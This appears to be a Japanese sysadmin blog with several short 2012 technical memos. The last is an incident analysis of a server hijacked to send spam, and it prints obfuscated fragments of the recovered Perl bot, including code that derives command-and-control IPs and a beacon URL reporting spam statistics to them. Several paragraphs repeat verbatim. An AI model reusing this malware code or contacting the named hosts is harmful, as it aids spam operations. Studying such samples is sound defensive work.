いーかげんどうしても M糞 Project を使いたくなかったので、openproj なる
OSS のプロジェクト管理ツールを使うことにして emerge した。
Java なのがアレだが…
LC_ALL が ja_JP.utf8 なのだが上部ツールバーは素直に日本語化された。
# sazanami フォントを入れる必要があった。
# icedtea には fontconfig.Gentoo.properties なんつーのが用意されている。
# 助かるなぁ。今使ってるのが Slackware じゃなくてよかった。
が、どうもスケジュール表部分上部の日付が「d m y」のフォーマットなので
見づらい。これだとプロジェクタで会社の上の方々に見せた時になんだかわか
らんコールがあると思われるので何とかせねば。こういうつまらんことにうる
さい人いるし。
Web で調べると、どうも上部ツールバーだけでなくメッセージやら何やらも
日本語化されている模様。本家には取り入られていないようだが、Web にその
ファイルがあったので以下からゲット。
https://github.com/alminium/angelfalls/raw/master/core/src/main/resources/com/projity/strings/client_ja.properties
んで、これを openproj.jar に取り入れなくちゃならん。なんで Java はこういう
設定系のファイルを平気で中に入れちゃうんだよ。。。 とりあえず jar コマンド
で展開して上記 URL のファイルを com/projity/strings/ に配置。再び jar コマ
ンドでアーカイブするも、MANIFEST ファイルの指定を忘れて数分悩む。
jar コマンドで固めるときは MANIFEST ファイルの指定を忘れないように! > 自分
あぁ Java メンドクセ
これでスケジュール表部分上部の日付も日本向けフォーマットになるかと思い
きやまだ「d m y」のまま。
仕方なく yy とかで grep したりしたら、com/projity/configuration/configuration.xml
ツーファイルにそれらしき定義があった。テキトーに当たりをつけて、以下の
ように修正してまた jar で固めたら出来たー。
--- openproj.orig/com/projity/configuration/configuration.xml 2008-10-01 11:10:30.000000000 +0900
+++ openproj/com/projity/configuration/configuration.xml 2012-10-25 18:13:17.000000000 +0900
@@ -768,7 +768,8 @@
pattern2="E d MMM" />
<timescale calendarField1="7" number1="1" pattern1="E"
trunc1="1" upperCase1="true" normalMinWidth="15" tableMinWidth="51"
- calendarField2="3" number2="1" pattern2="d MMM yy" />
+ calendarField2="3" number2="1" pattern2="yyyy/MMM/d" />
+<!-- calendarField2="3" number2="1" pattern2="d MMM yy" /> -->
<timescale calendarField1="5" number1="3" pattern1="dd"
normalMinWidth="30" tableMinWidth="51" calendarField2="2" number2="1"
pattern2="MMM y" />
2012年10月25日木曜日
2012年10月22日月曜日
dmg ファイルをマウント.
単なるメモ。
そのままマウントできない。dmg2img した後 hfsplus でマウント。
何をやりたかったかというと Richo プリンタの PPD 取得。
Richo プリンタの Mac 用のドライバは richo のサイトで dmg ファイルで
公開されていて、ここから PPD を取り出したい。
hfsplus でマウントした後、PPD_Installer_RICOH.mpkg/Contents/Sub/
下にあるお目当てのプリンタのディレクトリから .pax.gz なファイルを
見つけ出す。これを解凍すると cpio のイメージになるのでこの中に PPD あり。
そのままマウントできない。dmg2img した後 hfsplus でマウント。
何をやりたかったかというと Richo プリンタの PPD 取得。
Richo プリンタの Mac 用のドライバは richo のサイトで dmg ファイルで
公開されていて、ここから PPD を取り出したい。
hfsplus でマウントした後、PPD_Installer_RICOH.mpkg/Contents/Sub/
下にあるお目当てのプリンタのディレクトリから .pax.gz なファイルを
見つけ出す。これを解凍すると cpio のイメージになるのでこの中に PPD あり。
2012年10月18日木曜日
pgp keyserver
単なるコマンドメモ。
pg keyserver から公開鍵ゲット
gpg --keyserver pgp.nic.ad.jp --recv-keys XXXXXXXX
Proxy がある場合以下を指定 ↓
--keyserver-options http-proxy=http://localhost:3128
pg keyserver から公開鍵ゲット
gpg --keyserver pgp.nic.ad.jp --recv-keys XXXXXXXX
Proxy がある場合以下を指定 ↓
--keyserver-options http-proxy=http://localhost:3128
2012年10月4日木曜日
xmlのコメント文を取り除きたい
標題の件、xmllint でできない。--nocomment とかあるかと思ったが無い。
xmlstarletなんていう便利なものがあると知り、早速 emerge xmlstarlet。
xml コマンドに --with-comments なんてのがあった。
xml c14n --without-comments
でイケた。
xmlstarletなんていう便利なものがあると知り、早速 emerge xmlstarlet。
xml コマンドに --with-comments なんてのがあった。
xml c14n --without-comments
でイケた。
2012年9月23日日曜日
2012年9月6日木曜日
connect-msolservice で「資格情報を認証できません。」
標題のエラーが出た。嫌々 o365 の仕事をやってるのでバチがあたったのだろうか。
いろいろ調べたら、IE の設定に記している proxy サーバが落ちていた。
msonline モジュールって IE の設定見てるんですね…
いろいろ調べたら、IE の設定に記している proxy サーバが落ちていた。
msonline モジュールって IE の設定見てるんですね…
2012年8月29日水曜日
cracking
知人のサーバがクラックされた。ssh brute force による一般ユーザへの
ログインぽいのだが、/var/log/secure の記録だと一発でログインされて
いる風(失敗の記録がない...)。
root とられてる? 一応 chkrootkit したが結果としては問題なし。
で、何をやられていたかというと、SPAM メールの大量送信。perl スクリ
プトを送り込まれ、おそらく ssh から直接実行されている(wtmp にはロ
グイン記録が残っていないのでそう判断)。以下のような感じ。
501 20783 0.0 0.2 13056 8440 ? S Aug21 3:13 perl
501 19193 0.0 0.0 8148 2976 ? S 09:35 0:00 \_ /usr/sbin/sendmail -t
スクリプトは何処? lsof すると以下の出力あり。/tmp/ の下に置いたが
unlink してる模様。
perl 20783 user 0r CHR 1,3 2395 /dev/null
perl 20783 user 1w CHR 1,3 2395 /dev/null
perl 20783 user 2w CHR 1,3 2395 /dev/null
perl 20783 user 3r REG 253,0 10801 666887 /tmp/ (deleted)
perl 20783 user 4wW REG 253,0 0 666888 /tmp/...
なので /proc/20783/fd/3 からスクリプトゲット。ここに晒していいのか
な?問題になったら嫌なのでやめておく。改行入れてインデント揃えて解析
してみる。今時間が無いのでざっとだが、結構難解で、どこかに wget で
https 接続して送信リストみたいのを取得しているようなのだが、これがど
こからなのか解析すると固定文字でなくいろいろ計算してる。解析の結果お
そらく以下の IPアドレス。
77.67.80.31
85.214.80.4
ちなみにスクリプトの以下の部分
my $p="1234567890";
: (snip)
if($fjaj==4){
my @p=split '',$p;
my $i721=$p[6];
$i721="$i721$i721.6$i721.";
$i721 .=$p[7].$p[9];
$i721 .='.'.$p[2].$p[0];
return($i721, $bk10) if(aae($i721, $bk10));
}if($fjaj==5){my @p=split '',$p;
my $i721=$p[7].$p[4];
$i721 .='.'.$p[1].$p[0].$p[3];
$i721 .='.'.$p[7].$p[9];
$i721 .='.'.$p[3];
return($i721, $bk10) if(aae($i721, $bk10));
}
ポート番号も何か計算している、その先のリクエストは以下で
求めているようだが、各変数については時間が無いので後で調
べてみることにする。
my $b4ah="https://$jf8a:$bk10/$k7b2?id=$k14n";
$b4ah .="&sent=$jdga";
$b4ah .="¬sent=$jkjp";
$b4ah .="&unknown=".CGI::escape($cbmm) if($cbmm);
$b4ah .="&testsend=1" if($iod9);
$b4ah .="&stat=".ab5($jf8a, $j505);
@c404=ab8($b4ah);
ログインぽいのだが、/var/log/secure の記録だと一発でログインされて
いる風(失敗の記録がない...)。
root とられてる? 一応 chkrootkit したが結果としては問題なし。
で、何をやられていたかというと、SPAM メールの大量送信。perl スクリ
プトを送り込まれ、おそらく ssh から直接実行されている(wtmp にはロ
グイン記録が残っていないのでそう判断)。以下のような感じ。
501 20783 0.0 0.2 13056 8440 ? S Aug21 3:13 perl
501 19193 0.0 0.0 8148 2976 ? S 09:35 0:00 \_ /usr/sbin/sendmail -t
スクリプトは何処? lsof すると以下の出力あり。/tmp/ の下に置いたが
unlink してる模様。
perl 20783 user 0r CHR 1,3 2395 /dev/null
perl 20783 user 1w CHR 1,3 2395 /dev/null
perl 20783 user 2w CHR 1,3 2395 /dev/null
perl 20783 user 3r REG 253,0 10801 666887 /tmp/ (deleted)
perl 20783 user 4wW REG 253,0 0 666888 /tmp/...
なので /proc/20783/fd/3 からスクリプトゲット。ここに晒していいのか
な?問題になったら嫌なのでやめておく。改行入れてインデント揃えて解析
してみる。今時間が無いのでざっとだが、結構難解で、どこかに wget で
https 接続して送信リストみたいのを取得しているようなのだが、これがど
こからなのか解析すると固定文字でなくいろいろ計算してる。解析の結果お
そらく以下の IPアドレス。
77.67.80.31
85.214.80.4
ちなみにスクリプトの以下の部分
my $p="1234567890";
: (snip)
if($fjaj==4){
my @p=split '',$p;
my $i721=$p[6];
$i721="$i721$i721.6$i721.";
$i721 .=$p[7].$p[9];
$i721 .='.'.$p[2].$p[0];
return($i721, $bk10) if(aae($i721, $bk10));
}if($fjaj==5){my @p=split '',$p;
my $i721=$p[7].$p[4];
$i721 .='.'.$p[1].$p[0].$p[3];
$i721 .='.'.$p[7].$p[9];
$i721 .='.'.$p[3];
return($i721, $bk10) if(aae($i721, $bk10));
}
ポート番号も何か計算している、その先のリクエストは以下で
求めているようだが、各変数については時間が無いので後で調
べてみることにする。
my $b4ah="https://$jf8a:$bk10/$k7b2?id=$k14n";
$b4ah .="&sent=$jdga";
$b4ah .="¬sent=$jkjp";
$b4ah .="&unknown=".CGI::escape($cbmm) if($cbmm);
$b4ah .="&testsend=1" if($iod9);
$b4ah .="&stat=".ab5($jf8a, $j505);
@c404=ab8($b4ah);
登録:
投稿 (Atom)